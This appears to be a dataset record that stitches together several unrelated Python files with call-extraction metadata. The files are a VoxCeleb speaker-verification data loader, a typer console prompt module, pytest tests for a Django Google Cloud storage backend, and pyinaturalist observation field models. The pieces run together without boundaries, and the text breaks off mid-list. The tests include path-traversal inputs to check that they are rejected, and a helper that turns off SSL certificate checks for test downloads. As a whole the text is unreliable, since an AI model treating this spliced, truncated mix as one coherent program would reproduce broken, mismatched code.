| 3 | id10003/na8-QEFmj44/00003.wav |
| 1 | id10003/tCq2LcKO6xY/00002.wav |
| 1 | id10003/K5zRxtXc27s/00001.wav |
- veri_test2.txt, list_test_hard2.txt, list_test_all2.txt
| 1 | id10001/Y8hIVOBuels/00001.wav | id10001/1zcIwhmdeo4/00001.wav |
| 0 | id10001/Y8hIVOBuels/00001.wav | id10943/vNCVj7yLWPU/00005.wav |
| 1 | id10001/Y8hIVOBuels/00001.wav | id10001/7w0IBEWc9Qw/00004.wav |
"""
import os
from sugar.database import Utterance
from sugar.database import VerificationTrials
__all__ = ['idenset', 'veriset', 'veritrain']
idenlist = '/workspace/datasets/voxceleb/Vox1/iden_split.txt'
rootdir = '/workspace/datasets/voxceleb/voxceleb1'
verilist = '/workspace/datasets/voxceleb/Vox1/veri_split.txt' # create as the official mentioned
veritest2 = '/workspace/datasets/voxceleb/Vox2/veri_test2.txt'
veriall2 = '/workspace/datasets/voxceleb/Vox2/list_test_all2.txt'
verihard2 = '/workspace/datasets/voxceleb/Vox2/list_test_hard2.txt'
def idenset(listfile=idenlist, rootdir=rootdir, read_func=None, num_samples=48000, num_eval=2, is_xvector=True):
    """Build the VoxCeleb1 identification train/val/test sets from iden_split.txt.

    Each line of *listfile* is ``<split> <speaker_id>/<utterance>/<file>.wav``
    where split 1/2/3 marks the training/validation/test partition.

    Return
    ------
    train : Utterance
    val : Utterance
    test : Utterance
    spks : dict
        Speaker id -> integer label, assigned in sorted order.
    """
    TRAIN_TYPE, VAL_TYPE, TEST_TYPE = 1, 2, 3
    entries = []
    speaker_ids = set()
    with open(listfile, 'r') as f:
        for raw_line in f:
            raw_line = raw_line.replace('\n', '')
            label, rel_path = raw_line.split(' ')
            # The first path component is the speaker id.
            speaker_ids.add(rel_path.split('/')[0])
            entries.append((int(label), os.path.join(rootdir, rel_path)))
    # create speaker dictionary (alphabetical speaker order -> label index)
    spks = {spk: idx for idx, spk in enumerate(sorted(speaker_ids))}
    print('The "read" method of dataset is', read_func)
    # Partition the file list by split label.
    trainlst = [path for label, path in entries if label == TRAIN_TYPE]
    vallst = [path for label, path in entries if label == VAL_TYPE]
    testlst = [path for label, path in entries if label == TEST_TYPE]
    # convert list to Utterance; for x-vector systems the test set reads the
    # whole utterance (num_samples == 0) and is evaluated on num_eval segments.
    train = Utterance(trainlst, num_samples)
    val = Utterance(vallst, num_samples)
    test = Utterance(testlst, 0 if is_xvector else num_samples, True, num_eval)
    return train, val, test, spks
def veriset(test2=veritest2, all2=veriall2, hard2=verihard2, rootdir=rootdir, num_samples=48000, num_eval=2):
    """Load the VoxCeleb1 verification trial lists (Vox1-O/E/H).

    ``test2`` (veri_test2.txt) is always loaded; ``all2`` and ``hard2`` are
    loaded only when their list files exist, otherwise the corresponding
    return value is None.

    Return
    ------
    veri_test2 : VerificationTrials
    veri_all2 : VerificationTrials or None
    veri_hard2 : VerificationTrials or None
    wav_files : Utterance
        Deduplicated union of every wav file referenced by the loaded trials.

    Notes
    -----
    Utterance and VerificationTrials are both Dataset.
    By try-and-error, 2 x 5-second segments is better within 20 seconds.
    """
    def _load_optional(trial_list):
        # An optional trial list: skip it when unset or missing on disk.
        if trial_list is None or not os.path.exists(trial_list):
            return None
        return VerificationTrials(trial_list, num_samples, True, num_eval, rootdir)

    veri_test2 = VerificationTrials(test2, num_samples, True, num_eval, rootdir)
    veri_hard2 = _load_optional(hard2)
    veri_all2 = _load_optional(all2)
    # Collect the unique utterance files across all loaded trial lists,
    # then wrap them in a single Utterance dataset.
    unique_files = set()
    for trials in (veri_test2, veri_hard2, veri_all2):
        if trials is not None:
            unique_files.update(trials.files)
    wav_files = Utterance(list(unique_files), num_samples, True, num_eval)
    return veri_test2, veri_all2, veri_hard2, wav_files
def veritrain(listfile=verilist, rootdir=rootdir, num_samples=48000):
    """Return the identification training split plus its speaker-index map."""
    train_set, _val, _test, speaker_map = idenset(listfile, rootdir, num_samples)
    return train_set, speaker_map
if __name__ == '__main__':
    # Smoke test: load the three VoxCeleb1 trial protocols and report sizes.
    veri_test2, veri_all2, veri_hard2, wav_files = veriset()

    def _speakers(files):
        # Speaker id is the 3rd path component from the end:
        # .../<speaker>/<session>/<utterance>.wav
        return set(utt.split('/')[-3] for utt in files)

    print('# of utterances in Vox1-O: {:,}'.format(len(veri_test2.files)))
    print('# of utterances in Vox1-E: {:,}'.format(len(veri_all2.files)))
    print('# of utterances in Vox1-H: {:,}'.format(len(veri_hard2.files)))
    print('# of utterances in Vox1-E/H: {:,}'.format(len(set(veri_all2.files) | set(veri_hard2.files))))
    print('# of speakers in Vox1-O: {:,}'.format(len(_speakers(veri_test2.files))))
    print('# of speakers in Vox1-E: {:,}'.format(len(_speakers(veri_all2.files))))
    print('# of speakers in Vox1-H: {:,}'.format(len(_speakers(veri_hard2.files))))
    print('# of speakers in Vox1-E/H: {:,}'.format(len(_speakers(veri_all2.files) | _speakers(veri_hard2.files))))
    # Removed stray leftover debug statement `print(1)`.
|
[
"sugar.database.VerificationTrials",
"sugar.database.Utterance",
"os.path.join",
"os.path.exists"
] |
[((3033, 3065), 'sugar.database.Utterance', 'Utterance', (['trainlst', 'num_samples'], {}), '(trainlst, num_samples)\n', (3042, 3065), False, 'from sugar.database import Utterance\n'), ((3076, 3106), 'sugar.database.Utterance', 'Utterance', (['vallst', 'num_samples'], {}), '(vallst, num_samples)\n', (3085, 3106), False, 'from sugar.database import Utterance\n'), ((3118, 3190), 'sugar.database.Utterance', 'Utterance', (['testlst', '(num_samples if not is_xvector else 0)', '(True)', 'num_eval'], {}), '(testlst, num_samples if not is_xvector else 0, True, num_eval)\n', (3127, 3190), False, 'from sugar.database import Utterance\n'), ((4146, 4209), 'sugar.database.VerificationTrials', 'VerificationTrials', (['test2', 'num_samples', '(True)', 'num_eval', 'rootdir'], {}), '(test2, num_samples, True, num_eval, rootdir)\n', (4164, 4209), False, 'from sugar.database import VerificationTrials\n'), ((4742, 4791), 'sugar.database.Utterance', 'Utterance', (['wav_files', 'num_samples', '(True)', 'num_eval'], {}), '(wav_files, num_samples, True, num_eval)\n', (4751, 4791), False, 'from sugar.database import Utterance\n'), ((4227, 4290), 'sugar.database.VerificationTrials', 'VerificationTrials', (['hard2', 'num_samples', '(True)', 'num_eval', 'rootdir'], {}), '(hard2, num_samples, True, num_eval, rootdir)\n', (4245, 4290), False, 'from sugar.database import VerificationTrials\n'), ((4364, 4426), 'sugar.database.VerificationTrials', 'VerificationTrials', (['all2', 'num_samples', '(True)', 'num_eval', 'rootdir'], {}), '(all2, num_samples, True, num_eval, rootdir)\n', (4382, 4426), False, 'from sugar.database import VerificationTrials\n'), ((2468, 2499), 'os.path.join', 'os.path.join', (['rootdir', 'wav_path'], {}), '(rootdir, wav_path)\n', (2480, 2499), False, 'import os\n'), ((4316, 4337), 'os.path.exists', 'os.path.exists', (['hard2'], {}), '(hard2)\n', (4330, 4337), False, 'import os\n'), ((4451, 4471), 'os.path.exists', 'os.path.exists', (['all2'], {}), '(all2)\n', (4465, 4471), 
False, 'import os\n')]
|
"""Holds functions that ask a user for input"""
import warnings
from typing import List, Optional

import typer

from functions import logs
from functions import styles
from functions.config.models import FunctionConfig
from functions.constants import ConfigName
def ask(question: str, default: Optional[str] = None, options: Optional[List[str]] = None) -> str:
    """Prompt the user for a string answer in the console.

    Args:
        question: Text shown to the user.
        default: Value returned when the user just presses Enter.
        options: Allowed answers, appended to the prompt for display.
            NOTE(review): options are displayed but not enforced here — confirm
            whether validation is expected by callers.

    Returns:
        The string entered by the user (or ``default``).
    """
    # Fix: parameters defaulting to None were annotated as plain `str` /
    # `List[str]` (implicit Optional, rejected by PEP 484-strict checkers).
    if options:
        # Render the allowed values inline, e.g. " Options[a, b]".
        question += f"{styles.yellow(' Options')}[{', '.join(options)}]"
    return typer.prompt(
        question,
        default=default,
    )
def confirm(question: str, default: bool = False) -> bool:
    """Ask the user a yes/no question in the console and return the answer."""
    answer = typer.confirm(question, default=default)
    return answer
def confirm_abort(question: str) -> bool:
    """Yes/no console prompt that aborts the program when the user declines."""
    confirmed = typer.confirm(question, abort=True)
    return confirmed
def inform(msg: str, log: bool = True) -> None:
    """Show an informational message, via the logger or a plain console echo."""
    if not log:
        typer.echo(msg)
        return
    logs.info(logs.remove_empty_lines_from_string(msg))
def warn(msg: str, log: bool = True) -> None:
    """Show a warning, via the logger or the `warnings` module."""
    if not log:
        warnings.warn(f"{styles.yellow('WARNING: ')}{msg}")
        return
    logs.warning(logs.remove_empty_lines_from_string(msg))
def fail(msg: str, log: bool = True) -> None:
    """Report a failed execution, via the logger or the `warnings` module."""
    if not log:
        warnings.warn(msg)
        return
    logs.error(logs.remove_empty_lines_from_string(msg))
def prompt_to_save_config(config: FunctionConfig) -> None:
    """Offer to persist the configuration file into the function's directory."""
    question = (
        f"Do you want to store the configuration file ({ConfigName.BASE})"
        f" in the function's directory ({config.path})?"
    )
    if confirm(question, default=True):
        config.save()
|
[
"typer.echo",
"functions.logs.remove_empty_lines_from_string",
"typer.prompt",
"typer.confirm",
"warnings.warn",
"functions.styles.yellow"
] |
[((493, 532), 'typer.prompt', 'typer.prompt', (['question'], {'default': 'default'}), '(question, default=default)\n', (505, 532), False, 'import typer\n'), ((690, 730), 'typer.confirm', 'typer.confirm', (['question'], {'default': 'default'}), '(question, default=default)\n', (703, 730), False, 'import typer\n'), ((876, 911), 'typer.confirm', 'typer.confirm', (['question'], {'abort': '(True)'}), '(question, abort=True)\n', (889, 911), False, 'import typer\n'), ((1092, 1107), 'typer.echo', 'typer.echo', (['msg'], {}), '(msg)\n', (1102, 1107), False, 'import typer\n'), ((1527, 1545), 'warnings.warn', 'warnings.warn', (['msg'], {}), '(msg)\n', (1540, 1545), False, 'import warnings\n'), ((1032, 1072), 'functions.logs.remove_empty_lines_from_string', 'logs.remove_empty_lines_from_string', (['msg'], {}), '(msg)\n', (1067, 1072), False, 'from functions import logs\n'), ((1227, 1267), 'functions.logs.remove_empty_lines_from_string', 'logs.remove_empty_lines_from_string', (['msg'], {}), '(msg)\n', (1262, 1267), False, 'from functions import logs\n'), ((1467, 1507), 'functions.logs.remove_empty_lines_from_string', 'logs.remove_empty_lines_from_string', (['msg'], {}), '(msg)\n', (1502, 1507), False, 'from functions import logs\n'), ((431, 456), 'functions.styles.yellow', 'styles.yellow', (['""" Options"""'], {}), "(' Options')\n", (444, 456), False, 'from functions import styles\n'), ((1304, 1330), 'functions.styles.yellow', 'styles.yellow', (['"""WARNING: """'], {}), "('WARNING: ')\n", (1317, 1330), False, 'from functions import styles\n')]
|
# coding=utf-8
from __future__ import unicode_literals
import datetime
import ssl
from tempfile import TemporaryFile
import gcloud.exceptions
import pytest
from django.core.exceptions import SuspiciousFileOperation
from django.utils import six
from django.utils.crypto import get_random_string
from django_gcloud_storage import safe_join, remove_prefix, GCloudFile
def urlopen(*args, **kwargs):
    """Py2/Py3-compatible `urlopen` wrapper that disables SSL cert verification.

    Forwards all arguments to the stdlib urlopen; intended for fetching test
    URLs whose certificates may not validate in the CI environment.
    """
    try:
        from urllib.request import urlopen  # Python 3
    except ImportError:
        from urllib2 import urlopen  # Python 2 fallback
    try:
        # Ignore SSL errors (won't work on Py3.3 but can be ignored there)
        kwargs["context"] = ssl._create_unverified_context()
    except AttributeError:  # Py3.3: ssl module lacks _create_unverified_context
        pass
    return urlopen(*args, **kwargs)
@pytest.fixture
def storage(storage_object):
    """Storage fixture whose bucket is emptied of blobs from earlier runs."""
    from django_gcloud_storage import prepare_name
    bucket = storage_object.bucket
    for leftover in bucket.list_blobs():
        bucket.delete_blob(prepare_name(leftover.name))
    return storage_object
# noinspection PyClassHasNoInit,PyMethodMayBeStatic
class TestSafeJoin:
    """Behavioral tests for safe_join's path joining and normalization."""
    def test_should_join_urls(self):
        assert safe_join("test", "index.html") == "test/index.html"
    def test_should_not_break_on_slash_on_base(self):
        for base in ("test/", "test///"):
            assert safe_join(base, "index.html") == "test/index.html"
    def test_should_enforce_no_starting_slash_on_base(self):
        for base in ("/test", "////test"):
            assert safe_join(base, "index.html") == "test/index.html"
    def test_should_resolve_dots_to_absolute_path(self):
        assert safe_join("test", "/test/../index.html") == "test/index.html"
    def test_should_resolve_multiple_slashes(self):
        cases = [
            ("test", "/test//abc////index.html"),
            ("test///", "///test//abc////index.html"),
        ]
        for base, name in cases:
            assert safe_join(base, name) == "test/test/abc/index.html"
    def test_should_not_allow_escaping_base_path(self):
        for escaping_name in ("../index.html", "/../index.html"):
            with pytest.raises(SuspiciousFileOperation):
                safe_join("test", escaping_name)
    def test_should_work_with_bytes(self):
        assert safe_join(b"test", "index.html") == "test/index.html"
        assert safe_join("test", b"index.html") == "test/index.html"
        assert safe_join(b"test", b"index.html") == "test/index.html"
    def test_should_work_with_unicode_characters(self):
        assert safe_join("test", "brathähnchen.html") == "test/brathähnchen.html"
    def test_should_normalize_system_dependant_slashes(self):
        assert safe_join("test", "windows\\slashes") == "test/windows/slashes"
        assert safe_join("test", "windows\\/slashes") == "test/windows/slashes"
        assert safe_join("windows\\", "slashes") == "windows/slashes"
def test_remove_prefix_function():
    """remove_prefix strips a matching leading prefix; non-prefixes are no-ops."""
    stripped = remove_prefix("/a/b/c/", "/a/")
    assert stripped == "b/c/"
    untouched = remove_prefix("/a/b/c/", "/b/")
    assert untouched == "/a/b/c/"
# noinspection PyMethodMayBeStatic,PyTypeChecker
class TestGCloudFile:
    """Unit tests for GCloudFile's temp-file buffering and dirty-flag tracking."""
    # Non-ASCII content exercises the utf-8 round trip
    TEST_CONTENT = "Brathähnchen".encode("utf8")
    def test_should_be_able_to_read_and_write(self, monkeypatch):
        # NOTE(review): the zero-argument lambda would raise TypeError if
        # _update_blob were ever invoked on an instance (no slot for `self`);
        # presumably these operations never trigger it — confirm.
        monkeypatch.setattr(GCloudFile, "_update_blob", lambda: None)
        f = GCloudFile(None)
        f.open("w")
        assert f.read() == (b"" if six.PY3 else "")
        f.write(self.TEST_CONTENT)
        f.seek(0)
        assert f.read() == self.TEST_CONTENT
    def test_small_temporary_files_should_not_be_rolled_over_to_disk(self, monkeypatch):
        monkeypatch.setattr(GCloudFile, "_update_blob", lambda: None)
        f = GCloudFile(None, maxsize=1000)
        # Exactly at maxsize: the spooled buffer must stay in memory
        f.write("a".encode("utf8") * 1000)
        assert not f._tmpfile._rolled
    def test_large_temporary_files_should_be_rolled_over_to_disk(self, monkeypatch):
        monkeypatch.setattr(GCloudFile, "_update_blob", lambda: None)
        f = GCloudFile(None, maxsize=1000)
        # One byte over maxsize must force rollover to an on-disk file
        f.write("a".encode("utf8") * 1001)
        assert f._tmpfile._rolled
    def test_modified_files_should_be_marked_as_dirty(self, monkeypatch):
        monkeypatch.setattr(GCloudFile, "_update_blob", lambda: None)
        f = GCloudFile(None)
        f.write(self.TEST_CONTENT)
        assert f._dirty
# noinspection PyClassHasNoInit,PyMethodMayBeStatic
class TestGCloudStorageClass:
    """Integration tests for the storage backend, run against a real bucket
    provided by the `storage` fixture."""
    # Random suffixes keep repeated/concurrent test runs from colliding on blob names
    TEST_FILE_NAME = "test_file_" + get_random_string(6)
    TEST_FILE_NAME_UNICODE = "test_file_陰陽_" + get_random_string(6)
    TEST_FILE_CONTENT = "Brathähnchen".encode("utf8")
    def upload_test_file(self, storage, name, content):
        """Upload `content` (str or bytes) to `storage` under `name`."""
        if six.PY3 and isinstance(content, str):
            content = content.encode("utf8")
        with TemporaryFile() as testfile:
            testfile.write(content)
            testfile.seek(0)
            storage.save(name, testfile)
    def test_should_create_blob_at_correct_path(self, storage):
        with TemporaryFile() as testfile:
            testfile.write(self.TEST_FILE_CONTENT)
            testfile.seek(0)
            # save() must return the name it actually stored under
            storage_path = storage.save(self.TEST_FILE_NAME, testfile)
            assert storage_path == self.TEST_FILE_NAME
    def test_should_create_a_valid_client_object(self, storage):
        with pytest.raises(gcloud.exceptions.NotFound):
            storage.client.get_bucket("some_random_bucket_name_that_doesnt_exist")
    def test_should_create_a_valid_bucket_object(self, storage):
        assert storage.bucket.exists()
    def test_should_be_able_to_save_and_open_files(self, storage):
        self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
        f = storage.open(self.TEST_FILE_NAME)
        assert f.read() == self.TEST_FILE_CONTENT
    def test_should_return_created_time(self, storage):
        self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
        assert isinstance(storage.created_time(self.TEST_FILE_NAME), datetime.datetime)
    def test_should_return_modified_time(self, storage):
        self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
        assert isinstance(storage.modified_time(self.TEST_FILE_NAME), datetime.datetime)
    def test_should_be_able_to_delete_files(self, storage):
        self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
        storage.delete(self.TEST_FILE_NAME)
        # Should not raise an exception by gcloud
        assert storage.delete("missing_file") is None
    def test_exists_method(self, storage):
        assert not storage.exists(self.TEST_FILE_NAME)
        self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
        assert storage.exists(self.TEST_FILE_NAME)
    def test_should_return_correct_file_size(self, storage):
        self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
        assert storage.size(self.TEST_FILE_NAME) == len(self.TEST_FILE_CONTENT)
    def test_should_return_publicly_downloadable_url(self, storage):
        self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
        # Fetches the public URL over HTTP via the cert-ignoring urlopen above
        assert urlopen(storage.url(self.TEST_FILE_NAME)).read() == self.TEST_FILE_CONTENT
    def test_should_work_with_utf8(self, storage):
        self.upload_test_file(storage, self.TEST_FILE_NAME_UNICODE, self.TEST_FILE_CONTENT)
        storage.exists(self.TEST_FILE_NAME_UNICODE)
        # Don't explode when trying to find a available name for existing files...
        self.upload_test_file(storage, self.TEST_FILE_NAME_UNICODE, self.TEST_FILE_CONTENT)
    def test_should_be_able_to_list_dirs_and_files(self, storage):
        subdir_file_pattern = "/subdir/%s.%d"
        for i in range(1, 11):
            self.upload_test_file(storage, subdir_file_pattern % (self.TEST_FILE_NAME, i), "")
        self.upload_test_file(storage, "/subdir/a/" + self.TEST_FILE_NAME, "")
        self.upload_test_file(storage, "/subdir/b/" + self.TEST_FILE_NAME, "")
        # Make sure paths prefixed with a slash are normalized
        assert storage.listdir("") == storage.listdir("/")
        assert storage.listdir("subdir") == storage.listdir("/subdir")
        root_list_dir = storage.listdir("")
        assert len(root_list_dir[0]) == 1 and len(root_list_dir[1]) == 0
        assert root_list_dir[0] == ["subdir"]
        subdir_list_dir = storage.listdir("subdir/")
        assert len(subdir_list_dir[0]) == 2 and len(subdir_list_dir[1]) == 10
        assert subdir_list_dir[0] == ["a", "b"]
        assert subdir_list_dir[1][0] == "%s.%d" % (self.TEST_FILE_NAME, 1)
    def test_should_not_overwrite_files_on_save(self, storage):
        self.upload_test_file(storage, self.TEST_FILE_NAME, "")
        self.upload_test_file(storage, self.TEST_FILE_NAME, "")
        # Second save must have been stored under a different name -> two blobs
        assert len(storage.listdir("")[1]) == 2
    def test_changed_files_should_be_reuploaded(self, storage):
        self.upload_test_file(storage, self.TEST_FILE_NAME, "")
        first_modified_time = storage.modified_time(self.TEST_FILE_NAME)
        local_tmpfile = storage.open(self.TEST_FILE_NAME)
        assert local_tmpfile.read() == "".encode("ascii")
        local_tmpfile.seek(0)
        local_tmpfile.write(self.TEST_FILE_CONTENT)
        # close() should push the locally modified content back to the bucket
        local_tmpfile.close()
        assert storage.open(self.TEST_FILE_NAME).read() == self.TEST_FILE_CONTENT
        assert storage.modified_time(self.TEST_FILE_NAME) != first_modified_time
|
[
"django_gcloud_storage.prepare_name",
"django_gcloud_storage.remove_prefix",
"django_gcloud_storage.safe_join",
"tempfile.TemporaryFile",
"pytest.raises",
"django_gcloud_storage.GCloudFile",
"django.utils.crypto.get_random_string",
"ssl._create_unverified_context",
"urllib2.urlopen"
] |
[((719, 743), 'urllib2.urlopen', 'urlopen', (['*args'], {}), '(*args, **kwargs)\n', (726, 743), False, 'from urllib2 import urlopen\n'), ((625, 657), 'ssl._create_unverified_context', 'ssl._create_unverified_context', ([], {}), '()\n', (655, 657), False, 'import ssl\n'), ((2996, 3027), 'django_gcloud_storage.remove_prefix', 'remove_prefix', (['"""/a/b/c/"""', '"""/a/"""'], {}), "('/a/b/c/', '/a/')\n", (3009, 3027), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((3049, 3080), 'django_gcloud_storage.remove_prefix', 'remove_prefix', (['"""/a/b/c/"""', '"""/b/"""'], {}), "('/a/b/c/', '/b/')\n", (3062, 3080), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((3366, 3382), 'django_gcloud_storage.GCloudFile', 'GCloudFile', (['None'], {}), '(None)\n', (3376, 3382), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((3726, 3756), 'django_gcloud_storage.GCloudFile', 'GCloudFile', (['None'], {'maxsize': '(1000)'}), '(None, maxsize=1000)\n', (3736, 3756), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((4008, 4038), 'django_gcloud_storage.GCloudFile', 'GCloudFile', (['None'], {'maxsize': '(1000)'}), '(None, maxsize=1000)\n', (4018, 4038), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((4275, 4291), 'django_gcloud_storage.GCloudFile', 'GCloudFile', (['None'], {}), '(None)\n', (4285, 4291), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((4472, 4492), 'django.utils.crypto.get_random_string', 'get_random_string', (['(6)'], {}), '(6)\n', (4489, 4492), False, 'from django.utils.crypto import get_random_string\n'), ((4544, 4564), 'django.utils.crypto.get_random_string', 'get_random_string', (['(6)'], {}), '(6)\n', (4561, 4564), False, 'from django.utils.crypto import get_random_string\n'), ((1003, 1026), 'django_gcloud_storage.prepare_name', 'prepare_name', 
(['blob.name'], {}), '(blob.name)\n', (1015, 1026), False, 'from django_gcloud_storage import prepare_name\n'), ((1181, 1212), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test"""', '"""index.html"""'], {}), "('test', 'index.html')\n", (1190, 1212), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((1304, 1336), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test/"""', '"""index.html"""'], {}), "('test/', 'index.html')\n", (1313, 1336), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((1373, 1407), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test///"""', '"""index.html"""'], {}), "('test///', 'index.html')\n", (1382, 1407), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((1506, 1538), 'django_gcloud_storage.safe_join', 'safe_join', (['"""/test"""', '"""index.html"""'], {}), "('/test', 'index.html')\n", (1515, 1538), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((1575, 1610), 'django_gcloud_storage.safe_join', 'safe_join', (['"""////test"""', '"""index.html"""'], {}), "('////test', 'index.html')\n", (1584, 1610), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((1705, 1745), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test"""', '"""/test/../index.html"""'], {}), "('test', '/test/../index.html')\n", (1714, 1745), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((1835, 1880), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test"""', '"""/test//abc////index.html"""'], {}), "('test', '/test//abc////index.html')\n", (1844, 1880), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((1926, 1976), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test///"""', '"""///test//abc////index.html"""'], {}), "('test///', '///test//abc////index.html')\n", (1935, 1976), False, 'from 
django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((2077, 2115), 'pytest.raises', 'pytest.raises', (['SuspiciousFileOperation'], {}), '(SuspiciousFileOperation)\n', (2090, 2115), False, 'import pytest\n'), ((2129, 2163), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test"""', '"""../index.html"""'], {}), "('test', '../index.html')\n", (2138, 2163), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((2177, 2215), 'pytest.raises', 'pytest.raises', (['SuspiciousFileOperation'], {}), '(SuspiciousFileOperation)\n', (2190, 2215), False, 'import pytest\n'), ((2229, 2264), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test"""', '"""/../index.html"""'], {}), "('test', '/../index.html')\n", (2238, 2264), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((2324, 2356), 'django_gcloud_storage.safe_join', 'safe_join', (["b'test'", '"""index.html"""'], {}), "(b'test', 'index.html')\n", (2333, 2356), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((2393, 2425), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test"""', "b'index.html'"], {}), "('test', b'index.html')\n", (2402, 2425), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((2462, 2495), 'django_gcloud_storage.safe_join', 'safe_join', (["b'test'", "b'index.html'"], {}), "(b'test', b'index.html')\n", (2471, 2495), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((2589, 2627), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test"""', '"""brathähnchen.html"""'], {}), "('test', 'brathähnchen.html')\n", (2598, 2627), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((2734, 2771), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test"""', '"""windows\\\\slashes"""'], {}), "('test', 'windows\\\\slashes')\n", (2743, 2771), False, 'from django_gcloud_storage import 
safe_join, remove_prefix, GCloudFile\n'), ((2813, 2851), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test"""', '"""windows\\\\/slashes"""'], {}), "('test', 'windows\\\\/slashes')\n", (2822, 2851), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((2893, 2926), 'django_gcloud_storage.safe_join', 'safe_join', (['"""windows\\\\"""', '"""slashes"""'], {}), "('windows\\\\', 'slashes')\n", (2902, 2926), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((4780, 4795), 'tempfile.TemporaryFile', 'TemporaryFile', ([], {}), '()\n', (4793, 4795), False, 'from tempfile import TemporaryFile\n'), ((4993, 5008), 'tempfile.TemporaryFile', 'TemporaryFile', ([], {}), '()\n', (5006, 5008), False, 'from tempfile import TemporaryFile\n'), ((5303, 5344), 'pytest.raises', 'pytest.raises', (['gcloud.exceptions.NotFound'], {}), '(gcloud.exceptions.NotFound)\n', (5316, 5344), False, 'import pytest\n')]
|
from datetime import date, datetime
from typing import List, Union
from pyinaturalist.constants import TableRow
from pyinaturalist.converters import safe_split, try_int_or_float
from pyinaturalist.models import (
BaseModel,
LazyProperty,
Taxon,
User,
datetime_now_field,
define_model,
field,
)
# Mappings from observation field value datatypes to python datatypes
OFV_DATATYPES = {
    'dna': str,
    'date': date,
    'datetime': datetime,
    'numeric': try_int_or_float,
    'taxon': int,  # taxon fields carry a taxon ID
    'text': str,
    'time': str,
    }
# Union of all python types an observation field value may be converted to
OFVValue = Union[date, datetime, float, int, str]
@define_model
class ObservationField(BaseModel):
    """:fa:`tag` An observation field **definition**, based on the schema of
    `GET /observation_fields <https://www.inaturalist.org/pages/api+reference#get-observation_fields>`_.
    """
    allowed_values: List[str] = field(converter=safe_split, factory=list)
    created_at: datetime = datetime_now_field(doc='Date and time the observation field was created')
    datatype: str = field(default=None)  # Enum; one of the OFV_DATATYPES keys
    description: str = field(default=None)
    name: str = field(default=None)
    updated_at: datetime = datetime_now_field(
        doc='Date and time the observation field was last updated'
    )
    user_id: int = field(default=None)
    users_count: int = field(default=None)
    uuid: str = field(default=None)
    values_count: int = field(default=None)
    @property
    def row(self) -> TableRow:
        # Row representation used for table output
        return {
            'ID': self.id,
            'Type': self.datatype,
            'Name': self.name,
            'Description': self.description,
        }
    def __str__(self) -> str:
        # BUG FIX: the string previously lacked the `f` prefix, so the literal
        # text '{self.description}' was emitted instead of the description.
        description = f': {self.description}' if self.description else ''
        return f'[{self.id}] {self.name} ({self.datatype}){description}'
@define_model
class ObservationFieldValue(BaseModel):
    """:fa:`tag` An observation field **value**, based on the schema of ``Observation.ofvs``
    from `GET /observations <https://api.inaturalist.org/v1/docs/#!/Observations/get_observations>`_.
    """
    datatype: str = field(default=None)  # Enum; one of the OFV_DATATYPES keys
    field_id: int = field(default=None)
    name: str = field(default=None)
    taxon_id: int = field(default=None)
    user_id: int = field(default=None)
    uuid: str = field(default=None)
    value: OFVValue = field(default=None)
    taxon: property = LazyProperty(
        Taxon.from_json, type=Taxon, doc='Taxon that the observation field applies to'
    )
    user: property = LazyProperty(
        User.from_json, type=User, doc='User that applied the observation field value'
    )
    # Unused attributes
    # name_ci: str = field(default=None)
    # value_ci: int = field(default=None)
    # Convert value by datatype
    def __attrs_post_init__(self):
        # Coerce the raw value via the converter registered in OFV_DATATYPES
        # (e.g. 'numeric' -> int/float); unknown datatypes are left untouched.
        if self.datatype in OFV_DATATYPES and self.value is not None:
            converter = OFV_DATATYPES[self.datatype]
            self.value = converter(self.value)
    @property
    def row(self) -> TableRow:
        # Row representation used for table output
        return {
            'ID': self.id,
            'Type': self.datatype,
            'Name': self.name,
            'Value': self.value,
        }
    def __str__(self) -> str:
        return f'{self.name}: {self.value}'
|
[
"pyinaturalist.models.LazyProperty",
"pyinaturalist.models.field",
